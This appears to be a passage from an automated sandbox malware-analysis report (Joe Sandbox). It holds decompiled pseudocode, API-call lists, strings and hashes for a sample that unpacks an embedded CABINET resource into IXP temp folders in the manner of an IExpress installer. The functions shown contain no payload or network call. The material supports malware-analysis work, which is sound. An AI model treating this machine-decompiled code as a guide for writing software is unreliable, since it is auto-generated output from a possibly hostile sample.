									if((_v804 & 0x00000001) == 0) {
										__eflags = _t103 - _t116;
									} else {
										__eflags = _t110 - _t116;
									}
								} else {
									__eflags = _t103 + _t110 - _t116;
								}
								if(__eflags <= 0) {
									 *0xac9124 = 0;
									_t66 = 1;
								} else {
									_t66 = E00AC268B(_a4, _t110, _t103,  &_v16);
								}
								goto L32;
							}
							__eflags = _v816 & 0x00008000;
							if((_v816 & 0x00008000) == 0) {
								goto L20;
							}
							_t105 =  *0xac9a38; // 0x0
							_t110 =  *((intOrPtr*)(0xac89e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0xac89e0 + (_t78 & 0x0000ffff) * 4));
							_t103 = (_t105 >> 2) +  *0xac9a38;
							goto L21;
						}
						_t110 = 0x4c5;
						E00AC44B9(0, 0x4c5, 0, 0, 0x10, 0);
						goto L31;
					}
					memset( &_v788, 0, 0x200);
					 *0xac9124 = E00AC6285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
					_t110 = 0x4f9;
					goto L30;
				} else {
					_t110 = 0x4bc;
					E00AC44B9(0, 0x4bc, 0, 0, 0x10, 0);
					 *0xac9124 = E00AC6285();
					_t66 = 0;
					L33:
					return E00AC6CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
				}
			}

0x00ac597d
0x00ac5988
0x00ac598f
0x00ac599a
0x00ac59a6
0x00ac59a8
0x00ac59af
0x00ac59b9
0x00ac59dd
0x00ac59e4
0x00ac59f1
0x00ac59fe
0x00ac5a0b
0x00ac5a13
0x00ac5a19
0x00ac5a1b
0x00ac5ba1
0x00ac5baf
0x00ac5bbd
0x00ac5bd8
0x00ac5bde
0x00ac5be3
0x00ac5bec
0x00ac5bf0
0x00ac5bfc
0x00ac5c02
0x00ac5c02
0x00ac5c02
0x00ac5c04
0x00ac5c04
0x00000000
0x00ac5c04
0x00ac5a27
0x00ac5a3a
0x00ac5a46
0x00ac5a48
0x00ac5a4a
0x00000000
0x00000000
0x00ac5a64
0x00ac5a6a
0x00ac5a6c
0x00ac5abc
0x00ac5ac2
0x00ac5ac9
0x00ac5aca
0x00ac5aca
0x00ac5acc
0x00ac5acc
0x00ac5acf
0x00ac5ad1
0x00000000
0x00000000
0x00ac5ad3
0x00ac5ad6
0x00ac5ad8
0x00000000
0x00000000
0x00ac5ada
0x00ac5adc
0x00ac5add
0x00ac5add
0x00ac5ae0
0x00000000
0x00000000
0x00000000
0x00ac5ae0
0x00ac5ae2
0x00ac5ae4
0x00ac5ae6
0x00ac5ae6
0x00ac5ae6
0x00ac5ae9
0x00ac5aeb
0x00ac5af0
0x00ac5af6
0x00ac5af8
0x00ac5af9
0x00ac5af9
0x00ac5afb
0x00000000
0x00000000
0x00ac5afd
0x00ac5aff
0x00ac5b00
0x00ac5b03
0x00000000
0x00000000
0x00000000
0x00ac5b03
0x00ac5b05
0x00ac5b08
0x00ac5b20
0x00ac5b27
0x00ac5b52
0x00ac5b52
0x00ac5b5b
0x00ac5b62
0x00ac5b6b
0x00ac5b6d
0x00ac5b76
0x00ac5b7d
0x00ac5b83
0x00ac5b7f
0x00ac5b7f
0x00ac5b7f
0x00ac5b6f
0x00ac5b72
0x00ac5b72
0x00ac5b85
0x00ac5b98
0x00ac5b9e
0x00ac5b87
0x00ac5b8f
0x00ac5b8f
0x00000000
0x00ac5b85
0x00ac5b29
0x00ac5b33
0x00000000
0x00000000
0x00ac5b35
0x00ac5b48
0x00ac5b4a
0x00000000
0x00ac5b4a
0x00ac5b0f
0x00ac5b16
0x00000000
0x00ac5b16
0x00ac5a7c
0x00ac5a8a
0x00ac5aa5
0x00ac5aab
0x00000000
0x00ac59bb
0x00ac59c0
0x00ac59c7
0x00ac59d1
0x00ac59d6
0x00ac5c05
0x00ac5c14
0x00ac5c14

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00AC59A8
SetCurrentDirectoryA.KERNELBASE(?), ref: 00AC59AF
GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00AC5A13
MulDiv.KERNEL32(?,?,00000400), ref: 00AC5A40
GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00AC5A64
memset.MSVCRT ref: 00AC5A7C
GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00AC5A98
FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00AC5AA5
SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00AC5BFC

Part of subcall function 00AC44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00AC4518
Part of subcall function 00AC44B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 00AC4554

Part of subcall function 00AC6285: GetLastError.KERNEL32(00AC5BBC), ref: 00AC6285

Memory Dump Source

Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd

Similarity

API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
String ID:
API String ID: 4237285672-0
Opcode ID: e5c93ad83d18ff47a2fe15e04c0c1d9947e037cec055a52389c48847d3550e7d
Instruction ID: 3a3c7508bb8d1355e61f77d733a77f0266d448994df616a7a60ffe30f9f7fe8c
Opcode Fuzzy Hash: e5c93ad83d18ff47a2fe15e04c0c1d9947e037cec055a52389c48847d3550e7d
Instruction Fuzzy Hash: B77181B190060CAFEB25DB64CD89FFB77BCFB48344F5641ADF40596140EA34AE868B64

Uniqueness

Uniqueness Score: -1.00%

Function 00AC4FE0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 121
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E00AC4FE0(void* __edi, void* __eflags) {
				void* __ebx;
				void* _t8;
				struct HWND__* _t9;
				int _t10;
				void* _t12;
				struct HWND__* _t24;
				struct HWND__* _t27;
				intOrPtr _t29;
				void* _t33;
				int _t34;
				CHAR* _t36;
				int _t37;
				intOrPtr _t47;

				_t33 = __edi;
				_t36 = "CABINET";
				 *0xac9144 = E00AC468F(_t36, 0, 0);
				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
				 *0xac9140 = _t8;
				if(_t8 == 0) {
					return _t8;
				}
				_t9 =  *0xac8584; // 0x0
				if(_t9 != 0) {
					ShowWindow(GetDlgItem(_t9, 0x842), 0);
					ShowWindow(GetDlgItem( *0xac8584, 0x841), 5);
				}
				_t10 = E00AC4EFD(0, 0);
				if(_t10 != 0) {
					__imp__#20(E00AC4CA0, E00AC4CC0, E00AC4980, E00AC4A50, E00AC4AD0, E00AC4B60, E00AC4BC0, 1, 0xac9148, _t33);
					_t34 = _t10;
					if(_t34 == 0) {
						L8:
						_t29 =  *0xac9148; // 0x0
						_t24 =  *0xac8584; // 0x0
						E00AC44B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
						_t37 = 0;
						L9:
						goto L10;
					}
					__imp__#22(_t34, "*MEMCAB", 0xac1140, 0, E00AC4CD0, 0, 0xac9140); // executed
					_t37 = _t10;
					if(_t37 == 0) {
						goto L9;
					}
					__imp__#23(_t34); // executed
					if(_t10 != 0) {
						goto L9;
					}
					goto L8;
				} else {
					_t27 =  *0xac8584; // 0x0
					E00AC44B9(_t27, 0x4ba, 0, 0, 0x10, 0);
					_t37 = 0;
					L10:
					_t12 =  *0xac9140; // 0x0
					if(_t12 != 0) {
						FreeResource(_t12);
						 *0xac9140 = 0;
					}
					if(_t37 == 0) {
						_t47 =  *0xac91d8; // 0x0
						if(_t47 == 0) {
							E00AC44B9(0, 0x4f8, 0, 0, 0x10, 0);
						}
					}
					if(( *0xac8a38 & 0x00000001) == 0 && ( *0xac9a34 & 0x00000001) == 0) {
						SendMessageA( *0xac8584, 0xfa1, _t37, 0);
					}
					return _t37;
				}
			}

0x00ac4fe0
0x00ac4fe6
0x00ac4ff9
0x00ac500d
0x00ac5013
0x00ac501a
0x00ac5163
0x00ac5163
0x00ac5020
0x00ac5027
0x00ac5037
0x00ac5051
0x00ac5051
0x00ac5057
0x00ac505e
0x00ac50a7
0x00ac50ad
0x00ac50b4
0x00ac50e8
0x00ac50e8
0x00ac50ee
0x00ac50ff
0x00ac5104
0x00ac5106
0x00000000
0x00ac5106
0x00ac50cd
0x00ac50d3
0x00ac50da
0x00000000
0x00000000
0x00ac50dd
0x00ac50e6
0x00000000
0x00000000
0x00000000
0x00ac5060
0x00ac5060
0x00ac5070
0x00ac5075
0x00ac5107
0x00ac5107
0x00ac510e
0x00ac5111
0x00ac5117
0x00ac5117
0x00ac511f
0x00ac5121
0x00ac5127
0x00ac5135
0x00ac5135
0x00ac5127
0x00ac5141
0x00ac5159
0x00ac5159
0x00000000
0x00ac515f

APIs

Part of subcall function 00AC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00AC46A0
Part of subcall function 00AC468F: SizeofResource.KERNEL32(00000000,00000000,?,00AC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC46A9
Part of subcall function 00AC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00AC46C3
Part of subcall function 00AC468F: LoadResource.KERNEL32(00000000,00000000,?,00AC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC46CC
Part of subcall function 00AC468F: LockResource.KERNEL32(00000000,?,00AC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC46D3
Part of subcall function 00AC468F: memcpy_s.MSVCRT ref: 00AC46E5
Part of subcall function 00AC468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC46EF

FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00AC4FFE
LoadResource.KERNEL32(00000000,00000000), ref: 00AC5006
LockResource.KERNEL32(00000000), ref: 00AC500D
GetDlgItem.USER32(00000000,00000842), ref: 00AC5030
ShowWindow.USER32(00000000), ref: 00AC5037
GetDlgItem.USER32(00000841,00000005), ref: 00AC504A
ShowWindow.USER32(00000000), ref: 00AC5051
FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00AC5111
SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00AC5159

Strings

*MEMCAB, xrefs: 00AC50C7
CABINET, xrefs: 00AC4FE6, 00AC4FF7

Memory Dump Source

Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd

Similarity

API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
String ID: *MEMCAB$CABINET
API String ID: 1305606123-2642027498
Opcode ID: b815c1822b732ee92e3ca0e192510f4d9d11f04dab2c6216c087df4b3e9760c4
Instruction ID: e66f376e362a88028d50ce9b0f46bfd1f1e308c27be14b164215a16f4caa5530
Opcode Fuzzy Hash: b815c1822b732ee92e3ca0e192510f4d9d11f04dab2c6216c087df4b3e9760c4
Instruction Fuzzy Hash: 273107B0B807057FD720DBA1AD9EF7736ACB758789F0B061CF901A21A1DEB89C428654

Uniqueness

Uniqueness Score: -1.00%

Function 00AC44B9 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 160
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E00AC44B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
				signed int _v8;
				char _v64;
				char _v576;
				void* _v580;
				struct HWND__* _v584;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				void* _t37;
				signed int _t39;
				intOrPtr _t43;
				signed int _t44;
				signed int _t49;
				signed int _t52;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t58;
				intOrPtr _t59;
				int _t64;
				void* _t66;
				intOrPtr* _t67;
				signed int _t69;
				intOrPtr* _t73;
				intOrPtr* _t76;
				intOrPtr* _t77;
				void* _t80;
				void* _t81;
				void* _t82;
				intOrPtr* _t84;
				void* _t85;
				signed int _t89;

				_t75 = __edx;
				_t34 =  *0xac8004; // 0xc32e3ded
				_v8 = _t34 ^ _t89;
				_v584 = __ecx;
				_t83 = "LoadString() Error.  Could not load string resource.";
				_t67 = _a4;
				_t69 = 0xd;
				_t37 = memcpy( &_v64, _t83, _t69 << 2);
				_t80 = _t83 + _t69 + _t69;
				_v580 = _t37;
				asm("movsb");
				if(( *0xac8a38 & 0x00000001) != 0) {
					_t39 = 1;
				} else {
					_v576 = 0;
					LoadStringA( *0xac9a3c, _t75,  &_v576, 0x200);
					if(_v576 != 0) {
						_t73 =  &_v576;
						_t16 = _t73 + 1; // 0x1
						_t75 = _t16;
						do {
							_t43 =  *_t73;
							_t73 = _t73 + 1;
						} while (_t43 != 0);
						_t84 = _v580;
						_t74 = _t73 - _t75;
						if(_t84 == 0) {
							if(_t67 == 0) {
								_t27 = _t74 + 1; // 0x2
								_t83 = _t27;
								_t44 = LocalAlloc(0x40, _t83);
								_t80 = _t44;
								if(_t80 == 0) {
									goto L6;
								} else {
									_t75 = _t83;
									_t74 = _t80;
									E00AC1680(_t80, _t83,  &_v576);
									goto L23;
								}
							} else {
								_t76 = _t67;
								_t24 = _t76 + 1; // 0x1
								_t85 = _t24;
								do {
									_t55 =  *_t76;
									_t76 = _t76 + 1;
								} while (_t55 != 0);
								_t25 = _t76 - _t85 + 0x64; // 0x65
								_t83 = _t25 + _t74;
								_t44 = LocalAlloc(0x40, _t25 + _t74);
								_t80 = _t44;
								if(_t80 == 0) {
									goto L6;
								} else {
									E00AC171E(_t80, _t83,  &_v576, _t67);
									goto L23;
								}
							}
						} else {
							_t77 = _t67;
							_t18 = _t77 + 1; // 0x1
							_t81 = _t18;
							do {
								_t58 =  *_t77;
								_t77 = _t77 + 1;
							} while (_t58 != 0);
							_t75 = _t77 - _t81;
							_t82 = _t84 + 1;
							do {
								_t59 =  *_t84;
								_t84 = _t84 + 1;
							} while (_t59 != 0);
							_t21 = _t74 + 0x64; // 0x65
							_t83 = _t21 + _t84 - _t82 + _t75;
							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
							_t80 = _t44;
							if(_t80 == 0) {
								goto L6;
							} else {
								_push(_v580);
								E00AC171E(_t80, _t83,  &_v576, _t67);
								L23:
								MessageBeep(_a12);
								if(E00AC681F(_t67) == 0) {
									L25:
									_t49 = 0x10000;
								} else {
									_t54 = E00AC67C9(_t74, _t74);
									_t49 = 0x190000;
									if(_t54 == 0) {
										goto L25;
									}
								}
								_t52 = MessageBoxA(_v584, _t80, "lega", _t49 | _a12 | _a16); // executed
								_t83 = _t52;
								LocalFree(_t80);
								_t39 = _t52;
							}
						}
					} else {
						if(E00AC681F(_t67) == 0) {
							L4:
							_t64 = 0x10010;
						} else {
							_t66 = E00AC67C9(0, 0);
							_t64 = 0x190010;
							if(_t66 == 0) {
								goto L4;
							}
						}
						_t44 = MessageBoxA(_v584,  &_v64, "lega", _t64);
						L6:
						_t39 = _t44 | 0xffffffff;
					}
				}
				return E00AC6CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
			}

0x00ac44b9
0x00ac44c4
0x00ac44cb
0x00ac44d8
0x00ac44e4
0x00ac44eb
0x00ac44ee
0x00ac44ef
0x00ac44ef
0x00ac44f1
0x00ac44f7
0x00ac44f8
0x00ac467b
0x00ac44fe
0x00ac4509
0x00ac4518
0x00ac4525
0x00ac4562
0x00ac4568
0x00ac4568
0x00ac456b
0x00ac456b
0x00ac456d
0x00ac456e
0x00ac4572
0x00ac4578
0x00ac457c
0x00ac45cb
0x00ac4607
0x00ac4607
0x00ac460d
0x00ac4613
0x00ac4617
0x00000000
0x00ac461d
0x00ac4623
0x00ac4626
0x00ac4628
0x00000000
0x00ac4628
0x00ac45cd
0x00ac45cd
0x00ac45cf
0x00ac45cf
0x00ac45d2
0x00ac45d2
0x00ac45d4
0x00ac45d5
0x00ac45db
0x00ac45de
0x00ac45e3
0x00ac45e9
0x00ac45ed
0x00000000
0x00ac45f3
0x00ac45fd
0x00000000
0x00ac4602
0x00ac45ed
0x00ac457e
0x00ac457e
0x00ac4580
0x00ac4580
0x00ac4583
0x00ac4583
0x00ac4585
0x00ac4586
0x00ac458a
0x00ac458c
0x00ac458f
0x00ac458f
0x00ac4591
0x00ac4592
0x00ac459b
0x00ac459e
0x00ac45a3
0x00ac45a9
0x00ac45ad
0x00000000
0x00ac45af
0x00ac45af
0x00ac45bf
0x00ac462d
0x00ac4630
0x00ac463d
0x00ac464e
0x00ac464e
0x00ac463f
0x00ac4640
0x00ac4647
0x00ac464c
0x00000000
0x00000000
0x00ac464c
0x00ac4666
0x00ac466d
0x00ac466f
0x00ac4675
0x00ac4675
0x00ac45ad
0x00ac4527
0x00ac452e
0x00ac453f
0x00ac453f
0x00ac4530
0x00ac4531
0x00ac4538
0x00ac453d
0x00000000
0x00000000
0x00ac453d
0x00ac4554
0x00ac455a
0x00ac455a
0x00ac455a
0x00ac4525
0x00ac468c

APIs

LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00AC4518
MessageBoxA.USER32(?,?,lega,00010010), ref: 00AC4554
LocalAlloc.KERNEL32(00000040,00000065), ref: 00AC45A3
LocalAlloc.KERNEL32(00000040,00000065), ref: 00AC45E3
LocalAlloc.KERNEL32(00000040,00000002), ref: 00AC460D
MessageBeep.USER32(00000000), ref: 00AC4630
MessageBoxA.USER32(?,00000000,lega,00000000), ref: 00AC4666
LocalFree.KERNEL32(00000000), ref: 00AC466F

Part of subcall function 00AC681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00AC686E
Part of subcall function 00AC681F: GetSystemMetrics.USER32(0000004A), ref: 00AC68A7
Part of subcall function 00AC681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00AC68CC
Part of subcall function 00AC681F: RegQueryValueExA.ADVAPI32(?,00AC1140,00000000,?,?,0000000C), ref: 00AC68F4
Part of subcall function 00AC681F: RegCloseKey.ADVAPI32(?), ref: 00AC6902

Strings

LoadString() Error. Could not load string resource., xrefs: 00AC44E4
lega, xrefs: 00AC4545, 00AC465A

Memory Dump Source

Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd

Similarity

API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
String ID: LoadString() Error. Could not load string resource.$lega
API String ID: 3244514340-2134167237
Opcode ID: 673d026a45a249078390a7670bc46d4d83bd2ea462fd94a13012a61d041d88d0
Instruction ID: 4652a68a81d5dcaf2250ca97de5199147d551c2671efb847f5c72557045fef43
Opcode Fuzzy Hash: 673d026a45a249078390a7670bc46d4d83bd2ea462fd94a13012a61d041d88d0
Instruction Fuzzy Hash: 0051E376900219ABDF21DF68CC58FBA7B69EF49304F164198FD09A7241DB32DD06CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00AC53A1 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 71
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E00AC53A1(CHAR* __ecx, CHAR* __edx) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t5;
				long _t13;
				int _t14;
				CHAR* _t20;
				int _t29;
				int _t30;
				CHAR* _t32;
				signed int _t33;
				void* _t34;

				_t5 =  *0xac8004; // 0xc32e3ded
				_v8 = _t5 ^ _t33;
				_t32 = __edx;
				_t20 = __ecx;
				_t29 = 0;
				while(1) {
					E00AC171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
					_t34 = _t34 + 0x10;
					_t29 = _t29 + 1;
					E00AC1680(_t32, 0x104, _t20);
					E00AC658A(_t32, 0x104,  &_v268); // executed
					RemoveDirectoryA(_t32); // executed
					_t13 = GetFileAttributesA(_t32); // executed
					if(_t13 == 0xffffffff) {
						break;
					}
					if(_t29 < 0x190) {
						continue;
					}
					L3:
					_t30 = 0;
					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
						_t30 = 1;
						DeleteFileA(_t32);
						CreateDirectoryA(_t32, 0);
					}
					L5:
					return E00AC6CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
				}
				_t14 = CreateDirectoryA(_t32, 0); // executed
				if(_t14 == 0) {
					goto L3;
				}
				_t30 = 1;
				 *0xac8a20 = 1;
				goto L5;
			}

0x00ac53ac
0x00ac53b3
0x00ac53b9
0x00ac53bb
0x00ac53bd
0x00ac53bf
0x00ac53d1
0x00ac53d6
0x00ac53e0
0x00ac53e2
0x00ac53f5
0x00ac53fb
0x00ac5402
0x00ac540b
0x00000000
0x00000000
0x00ac5413
0x00000000
0x00000000
0x00ac5415
0x00ac5416
0x00ac5427
0x00ac542a
0x00ac542b
0x00ac5434
0x00ac5434
0x00ac543a
0x00ac544c
0x00ac544c
0x00ac5452
0x00ac545a
0x00000000
0x00000000
0x00ac545e
0x00ac545f
0x00000000

APIs

Part of subcall function 00AC171E: _vsnprintf.MSVCRT ref: 00AC1750

RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00AC53FB
GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00AC5402
GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00AC541F
DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00AC542B
CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00AC5434
CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00AC5452

Strings

IXP, xrefs: 00AC5419
IXP%03d.TMP, xrefs: 00AC53C0
C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00AC53B7, 00AC53E1, 00AC541E

Memory Dump Source

Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd

Similarity

API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$IXP$IXP%03d.TMP
API String ID: 1082909758-2966903483
Opcode ID: e3e8e5b75d70524253aee80418fd5d2b741ed1fa357f8dcf1a64801032c1faf8
Instruction ID: 2758eafdc06193fe2b426d95c0eb109f5a1a0eea401db61596a348497094fb1b
Opcode Fuzzy Hash: e3e8e5b75d70524253aee80418fd5d2b741ed1fa357f8dcf1a64801032c1faf8
Instruction Fuzzy Hash: 94110171B0060867E324DB769D49FAF36AEEBD6355F02012DF646D2291CE74898386A2

Uniqueness

Uniqueness Score: -1.00%

Function 00AC5467 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E00AC5467(CHAR* __ecx, void* __edx, char* _a4) {
				signed int _v8;
				char _v268;
				struct _SYSTEM_INFO _v304;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t10;
				void* _t13;
				intOrPtr _t14;
				void* _t16;
				void* _t20;
				signed int _t26;
				void* _t28;
				void* _t29;
				CHAR* _t48;
				signed int _t49;
				intOrPtr _t61;

				_t10 =  *0xac8004; // 0xc32e3ded
				_v8 = _t10 ^ _t49;
				_push(__ecx);
				if(__edx == 0) {
					_t48 = 0xac91e4;
					_t42 = 0x104;
					E00AC1680(0xac91e4, 0x104);
					L14:
					_t13 = E00AC58C8(_t48); // executed
					if(_t13 != 0) {
						L17:
						_t42 = _a4;
						if(_a4 == 0) {
							L23:
							 *0xac9124 = 0;
							_t14 = 1;
							L24:
							return E00AC6CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
						}
						_t16 = E00AC597D(_t48, _t42, 1, 0); // executed
						if(_t16 != 0) {
							goto L23;
						}
						_t61 =  *0xac8a20; // 0x0
						if(_t61 != 0) {
							 *0xac8a20 = 0;
							RemoveDirectoryA(_t48);
						}
						L22:
						_t14 = 0;
						goto L24;
					}
					if(CreateDirectoryA(_t48, 0) == 0) {
						 *0xac9124 = E00AC6285();
						goto L22;
					}
					 *0xac8a20 = 1;
					goto L17;
				}
				_t42 =  &_v268;
				_t20 = E00AC53A1(__ecx,  &_v268); // executed
				if(_t20 == 0) {
					goto L22;
				}
				_push(__ecx);
				_t48 = 0xac91e4;
				E00AC1781(0xac91e4, 0x104, __ecx,  &_v268);
				if(( *0xac9a34 & 0x00000020) == 0) {
					L12:
					_t42 = 0x104;
					E00AC658A(_t48, 0x104, 0xac1140);
					goto L14;
				}
				GetSystemInfo( &_v304);
				_t26 = _v304.dwOemId & 0x0000ffff;
				if(_t26 == 0) {
					_push("i386");
					L11:
					E00AC658A(_t48, 0x104);
					goto L12;
				}
				_t28 = _t26 - 1;
				if(_t28 == 0) {
					_push("mips");
					goto L11;
				}
				_t29 = _t28 - 1;
				if(_t29 == 0) {
					_push("alpha");
					goto L11;
				}
				if(_t29 != 1) {
					goto L12;
				}
				_push("ppc");
				goto L11;
			}

0x00ac5472
0x00ac5479
0x00ac5481
0x00ac5484
0x00ac551c
0x00ac5521
0x00ac5528
0x00ac552d
0x00ac552f
0x00ac5539
0x00ac554d
0x00ac554d
0x00ac5552
0x00ac5585
0x00ac5585
0x00ac558b
0x00ac558d
0x00ac559d
0x00ac559d
0x00ac5557
0x00ac555e
0x00000000
0x00000000
0x00ac5560
0x00ac5566
0x00ac5569
0x00ac556f
0x00ac556f
0x00ac5581
0x00ac5581
0x00000000
0x00ac5581
0x00ac5545
0x00ac557c
0x00000000
0x00ac557c
0x00ac5547
0x00000000
0x00ac5547
0x00ac548a
0x00ac5490
0x00ac5497
0x00000000
0x00000000
0x00ac549d
0x00ac54ab
0x00ac54b4
0x00ac54c0
0x00ac550c
0x00ac5511
0x00ac5515
0x00000000
0x00ac5515
0x00ac54c9
0x00ac54d6
0x00ac54d8
0x00ac54fe
0x00ac5503
0x00ac5507
0x00000000
0x00ac5507
0x00ac54da
0x00ac54dd
0x00ac54f7
0x00000000
0x00ac54f7
0x00ac54df
0x00ac54e2
0x00ac54f0
0x00000000
0x00ac54f0
0x00ac54e7
0x00000000
0x00000000
0x00ac54e9
0x00000000

APIs

GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00AC54C9
CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00AC553D
RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00AC556F

Part of subcall function 00AC53A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00AC53FB
